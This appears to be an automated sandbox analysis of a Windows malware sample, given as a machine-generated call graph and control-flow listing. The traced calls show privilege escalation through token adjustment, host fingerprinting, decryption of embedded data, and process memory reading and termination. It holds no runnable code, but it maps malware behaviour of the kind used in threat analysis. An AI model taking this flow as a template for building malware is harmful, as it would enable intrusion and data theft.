10307->10308 10309 5cb7dc 10308->10309 10309->10306 10310 5c91e0 RtlFreeHeap 10309->10310 10310->10306 10312 5d16ca 10311->10312 10313 5d16d0 10311->10313 10314 5c91e0 RtlFreeHeap 10312->10314 10315 5d1786 10313->10315 10353 5d1ff0 10313->10353 10314->10313 10318 5d16fc 10319 5d1710 10318->10319 10321 5c91e0 RtlFreeHeap 10318->10321 10322 5d1728 RtlEnterCriticalSection 10319->10322 10323 5c91e0 RtlFreeHeap 10319->10323 10320 5c91e0 RtlFreeHeap 10320->10318 10321->10319 10324 5d173d 10322->10324 10329 5d1744 10322->10329 10325 5d1725 10323->10325 10359 5c52f0 RtlEnterCriticalSection 10324->10359 10325->10322 10327 5d177b RtlLeaveCriticalSection 10327->10315 10329->10327 10369 5c1ea0 10329->10369 10330 5d1768 10330->10327 10332 5c3180 3 API calls 10331->10332 10335 5cae44 10332->10335 10333 5cae58 GetModuleFileNameW 10334 5c3f0d 10333->10334 10333->10335 10334->9773 10335->10333 10335->10334 10336 5c3180 3 API calls 10335->10336 10336->10335 10338 5c8cf8 10337->10338 10339 5c8d05 GetCurrentProcess OpenProcessToken 10337->10339 10460 5d18c0 10338->10460 10341 5c8d23 10339->10341 10349 5c8d6e 10339->10349 10343 5c8d2f LookupPrivilegeValueW 10341->10343 10346 5c8d44 AdjustTokenPrivileges 10343->10346 10343->10349 10344 5c8e25 10345 5c8e48 10344->10345 10347 5c8e2c AdjustTokenPrivileges CloseHandle 10344->10347 10345->9814 10346->10349 10347->10345 10348 5c8dd9 RevertToSelf 10350 5c8deb 10348->10350 10349->10344 10349->10348 10350->10344 10351 5c8def DuplicateTokenEx 10350->10351 10351->10344 10352 5c8e0e CloseHandle 10351->10352 10352->10344 10354 5d1ffa 10353->10354 10355 5d16ea 10353->10355 10356 5d2007 10354->10356 10357 5c91e0 RtlFreeHeap 10354->10357 10355->10318 10355->10320 10356->10355 10358 5c91e0 RtlFreeHeap 10356->10358 10357->10356 10358->10356 10360 5c532c 10359->10360 10368 5c5309 10359->10368 10361 5c5339 RtlLeaveCriticalSection 10360->10361 10363 5c91e0 RtlFreeHeap 10360->10363 10368->10360 10373 5cb860 10368->10373 10370 5c1ea7 10369->10370 10372 5c1ead 
10369->10372 10371 5c91e0 RtlFreeHeap 10370->10371 10371->10372 10372->10330 10374 5cb86d 10373->10374 10375 5cb874 10373->10375 10472 5d4520 10460->10472 10462 5d18d8 LoadLibraryW 10463 5d18e8 10462->10463 10464 5c8cfd 10462->10464 10465 5d18f2 GetProcAddress 10463->10465 10464->10339 10464->10345 10474 5d7160 10465->10474 10467 5d190c GetProcAddress 10468 5d7160 10467->10468 10469 5d1920 GetProcAddress 10468->10469 10470 5d7160 10469->10470 10473 5d4536 10472->10473 10473->10462 10475 5d716f 10474->10475 10475->10467 10523 5cd922 RtlEnterCriticalSection RtlLeaveCriticalSection 10522->10523 10524 5cd8d7 10522->10524 10523->9893 10525 5cd90c InitializeCriticalSectionAndSpinCount 10524->10525 10525->10523 10527 5c5140 3 API calls 10526->10527 10528 5d03fe 10527->10528 10529 5c91b0 3 API calls 10528->10529 10530 5d0410 10529->10530 10531 5c5140 3 API calls 10530->10531 10532 5d0419 10531->10532 10533 5c91b0 3 API calls 10532->10533 10534 5d0426 10533->10534 10534->9900 10536 5c3180 3 API calls 10535->10536 10537 5c91cf 10536->10537 10538 5d5d00 10537->10538 10539 5d5d27 GetVersionExW 10538->10539 10549 5d443a 10538->10549 10540 5c3180 3 API calls 10539->10540 10541 5d5d44 10540->10541 10542 5d5d4b GetComputerNameW 10541->10542 10541->10549 10543 5d5d68 10542->10543 10546 5d5d61 10542->10546 10544 5c3180 3 API calls 10543->10544 10545 5d5d73 GetComputerNameW 10544->10545 10545->10546 10547 5d68e0 MultiByteToWideChar 10546->10547 10548 5d5de7 10546->10548 10547->10548 10548->10549 10551 5d5e13 10548->10551 10558 5d6780 10549->10558 10552 5d5e32 Sleep 10551->10552 10594 5c8160 GetTickCount 10551->10594 10552->10551 10553 5d5e64 10552->10553 10554 5c3180 3 API calls 10553->10554 10555 5d5e7d 10554->10555 10556 5d5e95 10555->10556 10557 5c91e0 RtlFreeHeap 10555->10557 10556->10549 10557->10556 10559 5d67ac 10558->10559 10560 5d67a6 10558->10560 10562 5c3180 3 API calls 10559->10562 10561 5c91e0 RtlFreeHeap 10560->10561 10561->10559 10563 5d67c5 10562->10563 10564 5d67ce 
GetAdaptersInfo 10563->10564 10565 5d6802 10563->10565 10566 5d67df 10564->10566 10567 5d680b 10564->10567 10569 5d68c1 10565->10569 10572 5c91e0 RtlFreeHeap 10565->10572 10568 5c3180 3 API calls 10566->10568 10596 5cf800 CryptAcquireContextW 10567->10596 10571 5d67e9 10568->10571 10570 5d4441 10569->10570 10574 5c91e0 RtlFreeHeap 10569->10574 10570->9908 10571->10565 10575 5d67f6 GetAdaptersInfo 10571->10575 10572->10569 10574->10570 10575->10567 10577 5c3180 3 API calls 10578 5d684e 10577->10578 10578->10565 10578->10570 10579 5d68e0 MultiByteToWideChar 10578->10579 10579->10578 10581 5c1fd6 GetNativeSystemInfo 10580->10581 10582 5c1fe1 GetSystemInfo 10580->10582 10583 5c1fea 10581->10583 10582->10583 10584 5c3180 3 API calls 10583->10584 10585 5c215b 10584->10585 10586 5c21a6 10585->10586 10587 5c21af 10585->10587 10588 5c216f 10585->10588 10591 5d7b80 10586->10591 10590 5d68e0 MultiByteToWideChar 10587->10590 10589 5d68e0 MultiByteToWideChar 10588->10589 10589->10586 10590->10586 10592 5c5b70 3 API calls 10591->10592 10593 5d4495 10592->10593 10593->9895 10595 5c8196 10594->10595 10595->10551 10597 5cf8ad 10596->10597 10598 5cf832 CryptCreateHash 10596->10598 10600 5cf8ca CryptDestroyHash 10597->10600 10601 5cf8d1 10597->10601 10598->10597 10599 5cf84b CryptHashData 10598->10599 10599->10597 10602 5cf863 CryptGetHashParam 10599->10602 10600->10601 10603 5cf8ea 10601->10603 10604 5cf8e1 CryptReleaseContext 10601->10604 10602->10597 10605 5cf885 10602->10605 10603->10570 10603->10577 10604->10603 10606 5c3180 3 API calls 10605->10606 10607 5cf890 10606->10607 10607->10597 10608 5cf897 CryptGetHashParam 10607->10608 10608->10597 10609 5cf8b8 10608->10609 10610 5c91e0 RtlFreeHeap 10609->10610 10610->10597 10612 5d30cd 10611->10612 10614 5d30d4 10611->10614 10613 5c5140 3 API calls 10612->10613 10613->10614 10614->9925 10616 5cc53e SetFilePointer 10615->10616 10630 5cc5ac 10615->10630 10617 5cc5ba CloseHandle 10616->10617 10618 5cc552 SetFilePointer 10616->10618 
10617->10630 10618->10617 10619 5cc568 10618->10619 10620 5c3180 3 API calls 10619->10620 10621 5cc570 10620->10621 10621->10617 10622 5cc577 ReadFile 10621->10622 10623 5cc58b CloseHandle 10622->10623 10624 5cc5b1 10622->10624 10631 5cb9f0 10623->10631 10625 5c91e0 RtlFreeHeap 10624->10625 10627 5cc5b7 10625->10627 10627->10617 10629 5c91e0 RtlFreeHeap 10629->10630 10630->9945 10632 5cba03 10631->10632 10633 5cba23 CreateFileW 10632->10633 10641 5cba4d 10632->10641 10634 5cba48 10633->10634 10633->10641 10634->10629 10635 5cbdf2 CloseHandle 10635->10634 10638 5c3b80 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap RtlFreeHeap 10638->10641 10640 5d6750 4 API calls 10640->10641 10641->10638 10641->10640 10642 5cbb3a 10641->10642 10643 5c91e0 RtlFreeHeap 10641->10643 10645 5d2e00 WriteFile WriteFile 10641->10645 10646 5c5e10 10641->10646 10660 5ccff0 10641->10660 10664 5d7b90 10641->10664 10668 5d2310 10641->10668 10642->10634 10642->10635 10643->10641 10645->10641 10647 5c5e4a 10646->10647 10649 5c5e29 10646->10649 10647->10641 10648 5c3180 3 API calls 10650 5c5e85 10648->10650 10649->10647 10649->10648 10650->10647 10651 5c3180 3 API calls 10650->10651 10659 5c5f66 10650->10659 10653 5c5ece 10651->10653 10652 5c91e0 RtlFreeHeap 10652->10647 10653->10659 10672 5c9330 10653->10672 10656 5c3180 3 API calls 10658 5c5f0e 10656->10658 10657 5c91e0 RtlFreeHeap 10657->10659 10658->10657 10659->10652 10661 5cd00a 10660->10661 10662 5cd004 10660->10662 10661->10641 10663 5c91e0 RtlFreeHeap 10662->10663 10663->10661 10665 5d7ba8 10664->10665 10666 5d7b99 10664->10666 10665->10641 10666->10665 10667 5c91e0 RtlFreeHeap 10666->10667 10667->10665 10669 5d231f 10668->10669 10671 5d2344 10668->10671 10669->10671 10680 5c9520 10669->10680 10671->10641 10673 5c935d 10672->10673 10676 5c9357 10672->10676 10674 5c3180 3 API calls 10673->10674 10674->10676 10675 5c8160 GetTickCount 10675->10676 10676->10675 10677 5c93e8 10676->10677 10678 5c5efd 10677->10678 10679 5c91e0 RtlFreeHeap 
10677->10679 10678->10656 10679->10678 10682 5c953b 10680->10682 10683 5c9582 10682->10683 10684 5c4a20 10682->10684 10683->10671 10686 5c4a49 10684->10686 10685 5c4b88 Sleep 10685->10686 10686->10685 10687 5c4bc3 10686->10687 10689 5c4bb6 10686->10689 10688 5c3180 3 API calls 10687->10688 10688->10689 10689->10683 10746 5d4830 10690->10746 10694 5ccddc 10694->9961 10699 5d2dc0 10694->10699 10695 5ccdab 10696 5ccdb6 10695->10696 10783 5c6630 10695->10783 10696->10694 10697 5c91e0 RtlFreeHeap 10696->10697 10697->10694 10700 5d2dcb 10699->10700 10701 5d2dd1 10699->10701 10702 5c91e0 RtlFreeHeap 10700->10702 10703 5c1ea0 RtlFreeHeap 10701->10703 10704 5d2de2 10701->10704 10702->10701 10703->10704 10706 5cb7a0 4 API calls 10705->10706 10707 5c9b2d 10706->10707 10708 5c9b43 10707->10708 10709 5c91e0 RtlFreeHeap 10707->10709 10708->9977 10709->10708 10711 5d308d 10710->10711 10712 5d79f0 10710->10712 10897 5c9fd0 GetFileAttributesW 10711->10897 10713 5c5140 3 API calls 10712->10713 10715 5d7a05 10713->10715 10717 5c91b0 3 API calls 10715->10717 10720 5d7a17 10717->10720 10718 5d30ab 10718->9989 10719 5cc510 16 API calls 10721 5d30a7 10719->10721 10722 5c5140 3 API calls 10720->10722 10721->9989 10723 5d7a20 10722->10723 10899 5c61a0 10723->10899 10726 5c5140 3 API calls 10727 5d7a3d 10726->10727 10728 5c61a0 3 API calls 10727->10728 10729 5d7a4b SHGetFolderPathW 10728->10729 10730 5d7a7b 10729->10730 10731 5d7a70 10729->10731 10733 5d7ac1 10730->10733 10734 5d7a93 SHGetFolderPathW 10730->10734 10902 5d5710 10731->10902 10916 5ca4d0 10733->10916 10734->10733 10735 5d7aaa lstrcmpiW 10734->10735 10735->10733 10747 5d4855 10746->10747 10766 5d48f1 10746->10766 10791 5c22d0 10747->10791 10749 5d4945 10752 5d4956 10749->10752 10754 5c91e0 RtlFreeHeap 10749->10754 10751 5c91e0 RtlFreeHeap 10751->10749 10753 5ccd95 10752->10753 10755 5c91e0 RtlFreeHeap 10752->10755 10753->10696 10767 5cbe10 10753->10767 10754->10752 10755->10753 10756 5c22d0 11 API calls 10757 5d488a 
10756->10757 10757->10766 10801 5d5ab0 CryptAcquireContextW 10757->10801 10762 5d48e8 10765 5c3180 3 API calls 10762->10765 10763 5d4911 10823 5c2d40 10763->10823 10765->10766 10766->10749 10766->10751 10768 5cbe2c 10767->10768 10769 5cbe32 10767->10769 10771 5c91e0 RtlFreeHeap 10768->10771 10770 5c5140 3 API calls 10769->10770 10772 5cbe3c 10770->10772 10771->10769 10773 5c91b0 3 API calls 10772->10773 10774 5cbe4a 10773->10774 10775 5c3180 3 API calls 10774->10775 10779 5cbe5e 10775->10779 10776 5cc011 10778 5cc067 10776->10778 10828 5c1200 10776->10828 10778->10695 10779->10776 10779->10778 10780 5d66a0 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap RtlFreeHeap 10779->10780 10781 5c1200 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap 10779->10781 10782 5c4300 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap CharLowerBuffA RtlFreeHeap 10779->10782 10780->10779 10781->10779 10782->10779 10784 5c664b 10783->10784 10788 5c66ba 10783->10788 10785 5c670d 10784->10785 10784->10788 10832 5cc380 MultiByteToWideChar 10784->10832 10839 5c7130 10784->10839 10847 5c8e90 10784->10847 10785->10788 10790 5c91e0 RtlFreeHeap 10785->10790 10788->10696 10790->10788 10792 5c22ed 10791->10792 10799 5c2387 10791->10799 10793 5c3180 3 API calls 10792->10793 10795 5c22f9 10793->10795 10794 5cf800 11 API calls 10794->10795 10795->10794 10796 5c235d 10795->10796 10795->10799 10800 5c235b 10795->10800 10797 5c91e0 RtlFreeHeap 10796->10797 10796->10800 10797->10800 10798 5c91e0 RtlFreeHeap 10798->10799 10799->10756 10799->10766 10800->10798 10800->10799 10802 5d5ade 10801->10802 10808 5d5b95 10801->10808 10805 5d5b04 CryptImportKey 10802->10805 10803 5d5ba9 CryptDestroyKey 10804 5d5bb0 10803->10804 10806 5d48b5 10804->10806 10807 5d5bc0 CryptReleaseContext 10804->10807 10805->10808 10809 5d5b23 CryptSetKeyParam 10805->10809 10806->10766 10817 5cb250 GetVersion 10806->10817 10807->10806 10808->10803 10808->10804 10809->10808 10810 5d5b40 CryptSetKeyParam 10809->10810 10810->10808 10811 
5d5b56 10810->10811 10812 5c3180 3 API calls 10811->10812 10813 5d5b62 10812->10813 10813->10808 10814 5d5b76 CryptDecrypt 10813->10814 10814->10808 10815 5d5bde 10814->10815 10816 5c91e0 RtlFreeHeap 10815->10816 10816->10808 10818 5cb28e 10817->10818 10821 5cb286 10817->10821 10819 5cf800 11 API calls 10818->10819 10818->10821 10822 5cb2ca 10819->10822 10820 5c91e0 RtlFreeHeap 10820->10821 10821->10762 10821->10763 10821->10766 10822->10820 10822->10821 10824 5c3180 3 API calls 10823->10824 10826 5c2d57 10824->10826 10825 5c2d7f 10825->10766 10826->10825 10827 5c91e0 RtlFreeHeap 10826->10827 10827->10825 10829 5c120f 10828->10829 10831 5c1220 10828->10831 10830 5c3180 3 API calls 10829->10830 10830->10831 10831->10778 10833 5cc3d0 10832->10833 10834 5cc3a0 10832->10834 10833->10784 10835 5c3180 3 API calls 10834->10835 10836 5cc3b3 MultiByteToWideChar 10835->10836 10836->10833 10837 5cc3db 10836->10837 10838 5c91e0 RtlFreeHeap 10837->10838 10838->10833 10865 5d7040 10839->10865 10841 5c7216 10841->10784 10842 5c5140 3 API calls 10844 5c7147 10842->10844 10844->10841 10844->10842 10845 5cc380 6 API calls 10844->10845 10871 5d2ee0 SysAllocString SysAllocString 10844->10871 10872 5d4df0 10844->10872 10845->10844 10848 5c5140 3 API calls 10847->10848 10849 5c8eb1 10848->10849 10850 5c91b0 3 API calls 10849->10850 10863 5c8ebe 10850->10863 10851 5c8fc9 10852 5c8fff 10851->10852 10853 5c8fd4 10851->10853 10855 5c1ea0 RtlFreeHeap 10852->10855 10854 5c8fe0 10853->10854 10889 5c48c0 10853->10889 10858 5c1ea0 RtlFreeHeap 10854->10858 10859 5c8fee 10854->10859 10855->10859 10856 5cc380 6 API calls 10856->10863 10858->10859 10859->10784 10861 5c91e0 RtlFreeHeap 10861->10863 10862 5cb7a0 4 API calls 10862->10863 10863->10851 10863->10856 10863->10861 10863->10862 10864 5c1200 3 API calls 10863->10864 10884 5c9ff0 10863->10884 10864->10863 10866 5d706f 10865->10866 10870 5d704c 10865->10870 10867 5c91e0 RtlFreeHeap 10866->10867 10868 5d7076 10867->10868 10868->10844 
10870->10866 10879 5c1f90 10870->10879 10871->10844 10873 5d4dff 10872->10873 10874 5d4e5a 10872->10874 10875 5c3180 3 API calls 10873->10875 10874->10844 10876 5d4e13 10875->10876 10876->10874 10877 5c5140 3 API calls 10876->10877 10878 5d4e23 SysAllocString SysAllocString 10877->10878 10878->10874 10880 5c1f99 SysFreeString 10879->10880 10881 5c1fa0 10879->10881 10880->10881 10882 5c1fae 10881->10882 10883 5c1fa7 SysFreeString 10881->10883 10882->10870 10883->10882 10885 5ca015 10884->10885 10888 5c9fff 10884->10888 10885->10863 10886 5ca06a StrStrIW 10886->10888 10887 5c3180 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap 10887->10888 10888->10885 10888->10886 10888->10887 10890 5c499a 10889->10890 10891 5c48d6 10889->10891 10890->10854 10892 5c3180 3 API calls 10891->10892 10893 5c48e6 10892->10893 10894 5c3180 3 API calls 10893->10894 10896 5c4900 10894->10896 10895 5c8160 GetTickCount 10895->10896 10896->10890 10896->10895 10898 5c9fdf 10897->10898 10898->10718 10898->10719 10900 5c3180 3 API calls 10899->10900 10901 5c61bf 10900->10901 10901->10726 10903 5d5734 10902->10903 11074 5cd4ea PathAddBackslashW 11073->11074 11085 5cd504 11073->11085 11077 5cd4f6 11074->11077 11075 5c91e0 RtlFreeHeap 11076 5cd66b 11075->11076 11076->10000 11078 5cd55a FindFirstFileW 11077->11078 11077->11085 11078->11085 11087 5cd584 11078->11087 11079 5cd622 FindNextFileW 11080 5cd638 GetLastError FindClose 11079->11080 11079->11087 11080->11076 11084 5cd657 11080->11084 11081 5cd681 FindClose 11081->11084 11082 5c3180 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap 11082->11087 11083 5c91e0 RtlFreeHeap 11083->11084 11084->11083 11084->11085 11085->11075 11086 5d68e0 MultiByteToWideChar 11086->11087 11087->11079 11087->11081 11087->11082 11087->11086 11089 5d30c0 3 API calls 11088->11089 11090 5cae9d 11089->11090 11090->10000 11117 5d5630 CreateFileW 11091->11117 11094 5ccb66 11094->10000 11095 5ccb2a PathFindFileNameW PathFindExtensionW 11097 5ccb4a 11095->11097 11096 5c91e0 
RtlFreeHeap 11098 5ccb27 11096->11098 11099 5cb7a0 4 API calls 11097->11099 11098->11095 11100 5ccb59 11099->11100 11129 5c4750 11100->11129 11259 5d2e70 WideCharToMultiByte 11102->11259 11106 5ccfd0 11106->10000 11107 5ccf91 11112 5ccfbc 11107->11112 11272 5d20f0 11107->11272 11108 5c91e0 RtlFreeHeap 11108->11106 11112->11106 11112->11108 11114 5c3180 3 API calls 11113->11114 11115 5c3b51 RtlLeaveCriticalSection 11114->11115 11115->10000 11118 5d565c SetFilePointer SetFilePointer 11117->11118 11125 5d56b8 11117->11125 11120 5c3180 3 API calls 11118->11120 11119 5d56ca CloseHandle 11121 5d56c6 11119->11121 11122 5d567d 11120->11122 11123 5ccb11 11121->11123 11126 5c91e0 RtlFreeHeap 11121->11126 11124 5d5686 ReadFile 11122->11124 11122->11125 11123->11094 11123->11095 11123->11096 11124->11125 11127 5d5698 11124->11127 11125->11119 11125->11121 11126->11123 11128 5d4830 19 API calls 11127->11128 11128->11125 11130 5c487b 11129->11130 11136 5c4763 11129->11136 11137 5d7090 11130->11137 11134 5c4879 11134->11094 11136->11134 11153 5d0090 11136->11153 11138 5d7160 11137->11138 11139 5d70ab lstrlen 11138->11139 11140 5c4882 11139->11140 11142 5d70bd 11139->11142 11140->11136 11145 5cb960 11140->11145 11141 5cbe10 5 API calls 11141->11142 11142->11140 11142->11141 11144 5d712d lstrlen 11142->11144 11176 5ccba0 11142->11176 11144->11140 11144->11142 11148 5cb975 11145->11148 11146 5cb98f lstrcmpiW 11147 5cb9a7 11146->11147 11146->11148 11149 5cb7a0 4 API calls 11147->11149 11152 5cb9dc 11147->11152 11148->11146 11148->11147 11150 5cb9c0 11149->11150 11151 5c1200 3 API calls 11150->11151 11151->11152 11152->11136 11210 5cc720 11153->11210 11156 5d0217 11156->11134 11157 5c5140 3 API calls 11158 5d00b5 11157->11158 11159 5c91b0 3 API calls 11158->11159 11160 5d00c3 RtlEnterCriticalSection 11159->11160 11161 5d00d3 11160->11161 11166 5d0102 11160->11166 11162 5d00d7 lstrcmpiW 11161->11162 11163 5c1200 3 API calls 11161->11163 11161->11166 11162->11161 11163->11161 11164 
5d013a RtlLeaveCriticalSection 11165 5c1ea0 RtlFreeHeap 11164->11165 11171 5d014c 11165->11171 11166->11164 11219 5cd6b0 11166->11219 11168 5d01b3 11170 5d0211 11168->11170 11174 5d01ca lstrcmpiW 11168->11174 11175 5c91e0 RtlFreeHeap 11168->11175 11169 5d016c lstrcmpiW 11169->11171 11172 5c91e0 RtlFreeHeap 11170->11172 11171->11168 11171->11169 11173 5c91e0 RtlFreeHeap 11171->11173 11172->11156 11173->11171 11174->11168 11175->11168 11177 5ccbb3 11176->11177 11178 5ccc5b 11176->11178 11177->11178 11182 5c91e0 RtlFreeHeap 11177->11182 11183 5cc380 6 API calls 11177->11183 11184 5cff20 11177->11184 11191 5d6c00 11177->11191 11198 5caeb0 11177->11198 11178->11142 11182->11177 11183->11177 11185 5d1a10 RtlFreeHeap 11184->11185 11187 5cff32 11185->11187 11186 5d005d 11186->11177 11187->11186 11188 5c3180 3 API calls 11187->11188 11189 5cff81 11188->11189 11189->11186 11190 5cc380 6 API calls 11189->11190 11190->11189 11192 5d17a0 RtlFreeHeap 11191->11192 11194 5d6c12 11192->11194 11193 5d6d76 11193->11177 11194->11193 11195 5c3180 3 API calls 11194->11195 11196 5d6c5a 11195->11196 11196->11193 11197 5cc380 6 API calls 11196->11197 11197->11196 11200 5caec4 11198->11200 11199 5caf78 11199->11177 11200->11199 11202 5c4300 11200->11202 11203 5c430c 11202->11203 11204 5c431e 11202->11204 11203->11204 11205 5c3180 3 API calls 11203->11205 11204->11200 11206 5c432e 11205->11206 11207 5c433b CharLowerBuffA 11206->11207 11208 5c434a 11207->11208 11209 5c91e0 RtlFreeHeap 11208->11209 11209->11204 11211 5cc74f 11210->11211 11212 5cc735 11210->11212 11211->11156 11211->11157 11212->11211 11213 5cc779 11212->11213 11215 5cc76c 11212->11215 11214 5c3180 3 API calls 11213->11214 11217 5cc784 11214->11217 11216 5cb7a0 4 API calls 11215->11216 11216->11211 11217->11211 11218 5d68e0 MultiByteToWideChar 11217->11218 11218->11211 11220 5cd6c7 RtlEnterCriticalSection 11219->11220 11221 5cd6d2 11219->11221 11220->11221 11224 5cd829 11221->11224 11226 5cc720 5 API calls 11221->11226 11233 
5cd6f8 11221->11233 11222 5cd895 RtlLeaveCriticalSection 11223 5cd8a0 11222->11223 11223->11166 11225 5cb860 28 API calls 11224->11225 11227 5cd839 11224->11227 11225->11227 11228 5cd71d 11226->11228 11229 5cd86a 11227->11229 11230 5cd880 11227->11230 11228->11224 11249 5d0520 11228->11249 11231 5c3180 3 API calls 11229->11231 11232 5c91e0 RtlFreeHeap 11230->11232 11231->11233 11232->11233 11233->11222 11233->11223 11250 5d0540 11249->11250 11251 5d68e0 MultiByteToWideChar 11250->11251 11260 5d2e92 11259->11260 11264 5ccf75 11259->11264 11261 5c3180 3 API calls 11260->11261 11262 5d2ea2 WideCharToMultiByte 11261->11262 11263 5d2eca 11262->11263 11262->11264 11265 5c91e0 RtlFreeHeap 11263->11265 11264->11112 11266 5d1f80 11264->11266 11265->11264 11267 5d1f8c 11266->11267 11270 5d1fb0 11266->11270 11329 5cf430 11267->11329 11270->11107 11273 5d211a 11272->11273 11279 5d2e70 6 API calls 11273->11279 11293 5d2165 11273->11293 11275 5cb7a0 4 API calls 11292 5d21b0 11275->11292 11277 5ca170 4 API calls 11280 5d222e 11277->11280 11278 5d22c4 11282 5d22d5 11278->11282 11285 5c91e0 RtlFreeHeap 11278->11285 11284 5d214f 11279->11284 11288 5d2e70 6 API calls 11280->11288 11291 5d2241 11280->11291 11281 5c91e0 RtlFreeHeap 11281->11278 11283 5d22e5 11282->11283 11286 5c91e0 RtlFreeHeap 11282->11286 11287 5ccfa4 11283->11287 11290 5c91e0 RtlFreeHeap 11283->11290 11289 5d2e70 6 API calls 11284->11289 11284->11292 11285->11282 11286->11283 11287->11112 11294 5cc110 11287->11294 11288->11291 11289->11293 11290->11287 11291->11275 11291->11292 11292->11278 11292->11281 11293->11291 11293->11292 11532 5c9d40 11293->11532 11295 5cc128 11294->11295 11296 5cc372 11294->11296 11295->11296 11297 5cc165 11295->11297 11298 5cc153 lstrlen 11295->11298 11296->11112 11297->11296 11300 5cc182 11297->11300 11301 5c9cd0 3 API calls 11297->11301 11299 5c9cd0 3 API calls 11298->11299 11299->11297 11302 5c9cd0 3 API calls 11300->11302 11303 5cc359 11300->11303 11304 5cc1ae 11300->11304 11301->11300 
11302->11304 11303->11296 11307 5cc361 VirtualFreeEx 11303->11307 11306 5c9cd0 3 API calls 11304->11306 11308 5cc33e 11304->11308 11315 5cc1ff 11304->11315 11305 5d3fa0 14 API calls 11309 5cc25f 11305->11309 11316 5cc1d3 11306->11316 11307->11296 11308->11303 11310 5cc345 VirtualFreeEx 11308->11310 11311 5cc2d7 11309->11311 11314 5cc270 ReadProcessMemory 11309->11314 11323 5cc2b2 11309->11323 11310->11303 11312 5cc2f6 11311->11312 11318 5cc2e5 VirtualFreeEx 11311->11318 11312->11308 11313 5cc2fc ReadProcessMemory 11312->11313 11317 5cc31c VirtualFreeEx 11313->11317 11319 5cc290 VirtualFreeEx 11314->11319 11315->11305 11316->11312 11316->11315 11324 5c9cd0 3 API calls 11316->11324 11317->11308 11318->11312 11319->11323 11325 5cc2c9 11323->11325 11579 5d5020 11323->11579 11326 5cc213 11324->11326 11325->11311 11603 5c76a0 11325->11603 11328 5c91e0 RtlFreeHeap 11326->11328 11328->11315 11330 5cf44c 11329->11330 11331 5cf46c 11330->11331 11334 5cf498 11330->11334 11335 5cf4a8 11330->11335 11348 5c9a60 CreateToolhelp32Snapshot 11331->11348 11333 5cf475 11333->11334 11357 5c1250 11333->11357 11337 5cf4a0 11334->11337 11338 5cf562 TerminateProcess CloseHandle CloseHandle 11334->11338 11336 5cf4bf 11335->11336 11453 5c17f0 11335->11453 11336->11334 11443 5c7440 11336->11443 11337->11270 11347 5d4e70 GetSystemTimeAsFileTime _aulldiv 11337->11347 11338->11337 11345 5cf52d 11345->11333 11346 5cb7a0 4 API calls 11345->11346 11346->11333 11347->11270 11349 5c9ac9 11348->11349 11350 5c9a83 Process32FirstW 11348->11350 11349->11333 11351 5c9afd CloseHandle 11350->11351 11352 5c9a98 11350->11352 11351->11349 11353 5c9aac lstrcmpiW 11352->11353 11354 5c9acd OpenProcess 11353->11354 11355 5c9ab4 Process32NextW 11353->11355 11354->11351 11356 5c9ac5 11354->11356 11355->11353 11355->11356 11356->11351 11358 5c126e 11357->11358 11359 5c16f6 11358->11359 11360 5c127a CreateEventW CreateEventW CreateEventW GetCurrentProcess DuplicateHandle 11358->11360 11359->11334 11408 5d0920 

                          Executed Functions

                          Control-flow Graph

                          control_flow_graph 129 5d2370-5d23a1 call 5c61d0 132 5d23a5-5d23c6 SetLastError GetModuleHandleW GetLastError 129->132 132->132 133 5d23c8-5d23e8 132->133 134 5d23ee-5d2449 RtlAddVectoredExceptionHandler call 5c7340 call 5c3a80 call 5c3ec0 SetCurrentDirectoryW 133->134 135 5d24c9-5d24d0 133->135 158 5d2b7c-5d2b87 call 5c18e0 134->158 159 5d244f-5d2465 call 5d2d90 call 5c2da0 134->159 136 5d24e2-5d24e9 135->136 137 5d24d2-5d24d5 135->137 142 5d2528-5d2564 call 5c61e0 call 5c3180 call 5c61e0 call 5c9ee0 136->142 143 5d24eb-5d2522 call 5c5140 call 5d43c0 call 5cab10 call 5c5140 call 5c31d0 136->143 140 5d24db-5d24de 137->140 141 5d2b8a-5d2b96 call 5d1fe0 CoUninitialize ExitProcess 137->141 140->136 142->141 175 5d256a-5d2585 call 5d6610 call 5c91e0 142->175 143->142 158->141 177 5d2467-5d246e 159->177 178 5d2481-5d24bd call 5c3180 GetTickCount 159->178 189 5d258a-5d25b3 call 5cc7c0 call 5d7770 175->189 177->178 180 5d2470-5d2471 call 5c3200 177->180 178->135 187 5d24bf-5d24c4 call 5d1690 178->187 188 5d2476-5d247b 180->188 187->135 188->141 188->178 196 5d25cc-5d25ce 189->196 197 5d25b5-5d25c7 Sleep 189->197 196->141 199 5d25d4-5d25ec call 5d6750 196->199 197->189 198 5d25c9-5d25ca 197->198 198->196 202 5d25ee-5d260e call 5d4980 CreateThread 199->202 203 5d2614-5d2623 199->203 202->203 204 5d262b-5d2644 call 5cc430 203->204 209 5d264a-5d2652 204->209 210 5d2aa6 204->210 212 5d29f5-5d2a1e call 5c42f0 call 5d6bd0 209->212 211 5d2aae-5d2ae3 call 5c1b50 call 5cc7c0 210->211 223 5d2ae5-5d2b04 call 5c1b50 211->223 224 5d2b56-5d2b5b 211->224 221 5d2a4c-5d2a51 212->221 222 5d2a20-5d2a33 call 5d4e70 212->222 227 5d2a79 Sleep 221->227 233 5d2a59-5d2a6e call 5c3c40 222->233 234 5d2a35-5d2a4a call 5c5960 222->234 223->224 236 5d2b06-5d2b0e 223->236 224->204 226 5d2b61-5d2b63 224->226 226->204 230 5d2b69-5d2b77 call 5cab60 226->230 232 5d2a7b-5d2a9e call 5cc430 227->232 230->204 232->212 245 5d2aa4 232->245 251 5d2a74 233->251 252 5d2657-5d2669 233->252 
